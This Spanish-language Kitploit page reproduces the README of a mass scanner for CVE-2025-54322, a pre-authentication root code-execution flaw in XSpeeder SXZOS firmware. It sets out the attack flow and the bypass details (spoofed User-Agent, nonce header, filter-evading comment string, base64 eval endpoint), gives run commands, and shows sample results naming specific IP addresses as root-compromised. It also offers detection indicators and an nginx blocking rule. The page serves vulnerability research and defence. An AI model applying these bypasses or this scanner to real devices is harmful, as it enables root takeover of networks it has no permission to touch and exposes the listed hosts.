Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/sachinart/cve-2025-54322
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubsachinart/cve-2025-54322

CVE-2025-54322

CVE-2025-54322 - XSpeeder SXZOS Buscador rápido de 0day RCE pre-auth

Ver Repositorio
82hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-54322 - Escáner de RCE Pre-Auth para XSpeeder SXZOS

License Python CVE

Un escáner de vulnerabilidades multihilo para CVE-2025-54322, una vulnerabilidad de ejecución remota de código no autenticada en el firmware XSpeeder SXZOS que afecta a más de ~70.000 hosts a nivel mundial.

📋 Tabla de Contenidos

  • Acerca de la Vulnerabilidad
  • Características
  • Instalación
  • Uso
  • Salida
  • Aviso Legal
  • Créditos
  • Autor

🔍 Acerca de la Vulnerabilidad

CVE-2025-54322 es una vulnerabilidad crítica de ejecución remota de código sin autenticación previa descubierta en el firmware XSpeeder SXZOS, que alimenta dispositivos SD-WAN, enrutadores y equipos de red perimetral.

Detalles de la Vulnerabilidad

  • ID CVE: CVE-2025-54322
  • Vendedor: XSpeeder (vendedor de redes chino)
  • Producto Afectado: Firmware SXZOS
  • Tipo de Vulnerabilidad: Ejecución Remota de Código sin Autenticación (RCE)
  • Puntuación CVSS: 9.8+ (Crítica)
  • Vector de Ataque: Red
  • Privilegios Requeridos: Ninguno
  • Interacción del Usuario: Ninguna
  • Impacto: Compromiso total del sistema con privilegios de root

Detalles Técnicos

La vulnerabilidad existe en la interfaz web basada en Django del firmware SXZOS:

  1. Endpoint Vulnerable: /?title=ABC&oIp=XXX&chkid=[base64_payload]
  2. Causa Raíz: Uso inseguro de la función eval() de Python en la entrada de usuario decodificada en base64
  3. Autenticación: No requerida (pre-autenticación)
  4. Contexto de Ejecución: Privilegios de root
  5. Hosts Afectados: ~70.000+ dispositivos accesibles públicamente a nivel mundial

Flujo de Ataque

root@kitploit:~
1. Calculate time-based nonce for X-SXZ-R header
2. Warm up session via /webInfos/ endpoint
3. Craft malicious payload with bypass string (#sUserCodexsPwd)
4. Base64 encode payload
5. Send exploit with exactly 3 query parameters
6. Server decodes and evaluates payload
7. Commands execute with root privileges

Mecanismos de Bypass

El exploit sortea múltiples capas de defensa:

  • Verificación de User-Agent de Nginx: Suplantado con SXZ/2.3
  • Nonce basado en tiempo: Cabecera calculada X-SXZ-R: [0-6]
  • Requisito de Sesión: Calentada mediante /webInfos/
  • Filtro de Cadenas: Evitado con el comentario #sUserCodexsPwd
  • Conteo de Parámetros: Mantiene exactamente 3 parámetros de consulta

✨ Características

  • ✅ Escaneo multihilo - Pruebas concurrentes de múltiples objetivos
  • ✅ Omisión de SSL - Maneja certificados autofirmados e inválidos
  • ✅ Lógica de reintento inteligente - 2 intentos de reintento por objetivo
  • ✅ Salida limpia - Muestra solo hosts vulnerables
  • ✅ Escritura en archivo en tiempo real - Guarda resultados en vuln-confirm.txt inmediatamente
  • ✅ Seguimiento de progreso - Actualizaciones de progreso en vivo cada 50 hosts
  • ✅ Operaciones seguras para hilos - Operaciones concurrentes seguras de archivo y consola
  • ✅ Detección precisa - Validación basada en regex de ejecución de comandos
  • ✅ Lógica coincidente con PoC - Sigue la metodología original de explotación

🚀 Instalación

Prerrequisitos

  • Python 3.7 o superior
  • Administrador de paquetes pip

Configuración

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322

# Instalar dependencias requeridas
pip install -r requirements.txt

Dependencias

Crea un archivo requirements.txt:

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0

📖 Uso

Uso Básico

root@kitploit:~
python3 scanner.py targets.txt

Uso Avanzado

root@kitploit:~
# Escanear con número personalizado de hilos (por defecto: 10)
python3 scanner.py targets.txt 20

# Escanear con máximo de hilos para resultados más rápidos
python3 scanner.py targets.txt 50

# Escanear con número conservador de hilos
python3 scanner.py targets.txt 5

Formato del Archivo de Objetivos

Crea un archivo targets.txt con un objetivo por línea:

root@kitploit:~
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local

Ejemplo de Sesión

root@kitploit:~
$ python3 scanner.py targets.txt 20

╔═══════════════════════════════════════════════════════════════╗
║     XSpeeder SXZOS (CVE-2025-54322) RCE Scanner              ║
║     Pre-Auth Root RCE Vulnerability Checker                   ║
║     Showing: VULNERABLE HOSTS ONLY                            ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...

======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================

[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable

======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================

📊 Salida

Salida en Consola

El escáner muestra:

  • Descubrimientos de hosts vulnerables en tiempo real
  • Actualizaciones de progreso cada 50 hosts
  • Resumen final con estadísticas
  • Resultados limpios y organizados

Salida en Archivo (vuln-confirm.txt)

root@kitploit:~
XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================

https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------

======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds

🎯 Recomendaciones de Hilos

⚠️ Aviso Legal

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

Aviso Legal

  • Solo pruebe sistemas que le pertenezcan o para los que tenga permiso explícito por escrito
  • El acceso no autorizado a sistemas informáticos es ilegal en la mayoría de las jurisdicciones
  • El autor no asume ninguna responsabilidad por el mal uso de esta herramienta
  • Al usar esta herramienta, acepta usarla de manera responsable y ética
  • Esta herramienta es solo para investigación de seguridad y pruebas de penetración

Divulgación Responsable

Si descubre sistemas vulnerables:

  1. No explote más allá de confirmar la vulnerabilidad
  2. Reporte los hallazgos al propietario del sistema de inmediato
  3. Permita un tiempo razonable para la remediación
  4. No divulgue públicamente hosts vulnerables específicos

Uso Ético

  • SÍ: Use para pruebas de penetración autorizadas
  • SÍ: Use para investigación de seguridad con permiso
  • SÍ: Reporte vulnerabilidades de manera responsable
  • NO: Use para acceso no autorizado
  • NO: Use con fines maliciosos
  • NO: Exponga públicamente sistemas vulnerables

🛡️ Mitigación

Para Administradores de Sistemas

Si administra dispositivos XSpeeder SXZOS:

  1. Aísle inmediatamente los dispositivos afectados de internet público
  2. Implemente segmentación de red para limitar la exposición
  3. Implemente reglas WAF para bloquear intentos de explotación
  4. Monitoree registros en busca de indicadores de compromiso
  5. Contacte a XSpeeder para actualizaciones de firmware (vendedor no responde a la fecha de publicación)
  6. Considere soluciones alternativas si el vendedor sigue sin responder

Detección

Busque estos indicadores en los registros:

  • Solicitudes a /?title=*&oIp=*&chkid=* con cargas útiles en base64
  • User-Agent: SXZ/2.3
  • Cabeceras X-SXZ-R inusuales
  • Cadenas base64 que contengan #sUserCodexsPwd
  • Múltiples solicitudes a /webInfos/ seguidas de la ruta raíz

Soluciones Temporales

root@kitploit:~
# Regla de Nginx para bloquear intentos de explotación
location / {
    if ($args ~* "chkid=") {
        return 403;
    }
}

📚 Referencias

  • Divulgación Original: pwn.ai - CVE-2025-54322 Zero-Day
  • Entrada NVD: CVE-2025-54322 (pendiente)
  • Vendedor: XSpeeder (sin respuesta después de más de 7 meses)

🙏 Créditos

Descubrimiento Original de la Vulnerabilidad

Esta vulnerabilidad fue descubierta de forma autónoma por pwn.ai, una plataforma de investigación de seguridad impulsada por IA.

  • Plataforma de Descubrimiento: pwn.ai
  • Divulgación Original: Artículo en el Blog de pwn.ai
  • Fecha de Descubrimiento: Descubierto por agentes de pwn.ai más de 10 meses antes de la publicación
  • Cronología de Divulgación: Más de 7 meses de contacto con el vendedor sin respuesta

Nota Importante: Esta es la primera vulnerabilidad RCE zero-day encontrada por agentes, explotable de forma remota y documentada públicamente.

👨‍💻 Autor

Chirag Artani

  • 🌐 Sitio web: https://3rag.com
  • 🔐 Investigador de Seguridad & Probador de Penetración

Acerca del Escáner

Esta implementación del escáner fue creada para ayudar a los profesionales de seguridad a:

  • Identificar dispositivos XSpeeder SXZOS vulnerables en sus redes
  • Realizar pruebas de penetración autorizadas
  • Validar la efectividad de la implementación de parches
  • Investigación y concienciación en seguridad

📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.

🤝 Contribuciones

¡Las contribuciones son bienvenidas! No dude en enviar una Solicitud de Cambio (Pull Request).

Directrices

  1. Siga las guías de estilo PEP 8
  2. Agregue comentarios para lógica compleja
  3. Pruebe exhaustivamente antes de enviar
  4. Actualice la documentación según sea necesario
  5. Asegure solo casos de uso éticos

📞 Soporte

Para preguntas, problemas o sugerencias:

  • Abra un issue en GitHub
  • Visite https://3rag.com
  • Siga las prácticas de divulgación responsable

Recuerde: Un gran poder conlleva una gran responsabilidad. Use esta herramienta de manera ética y legal.

Manténgase Seguro. Manténgase Ético. Manténgase Legal.

Descargar herramienta
CVE-2025-54322 — CVE-2025-54322 - XSpeeder SXZOS Buscador rápido de 0day RCE pre-auth | Kitploit
Cantidad de ObjetivosHilos RecomendadosTiempo Esperado
1-105 hilos~1-2 min
10-5010 hilos~3-5 min
50-10020 hilos~5-10 min
100-50030 hilos~10-20 min
500+40-50 hilos~20+ min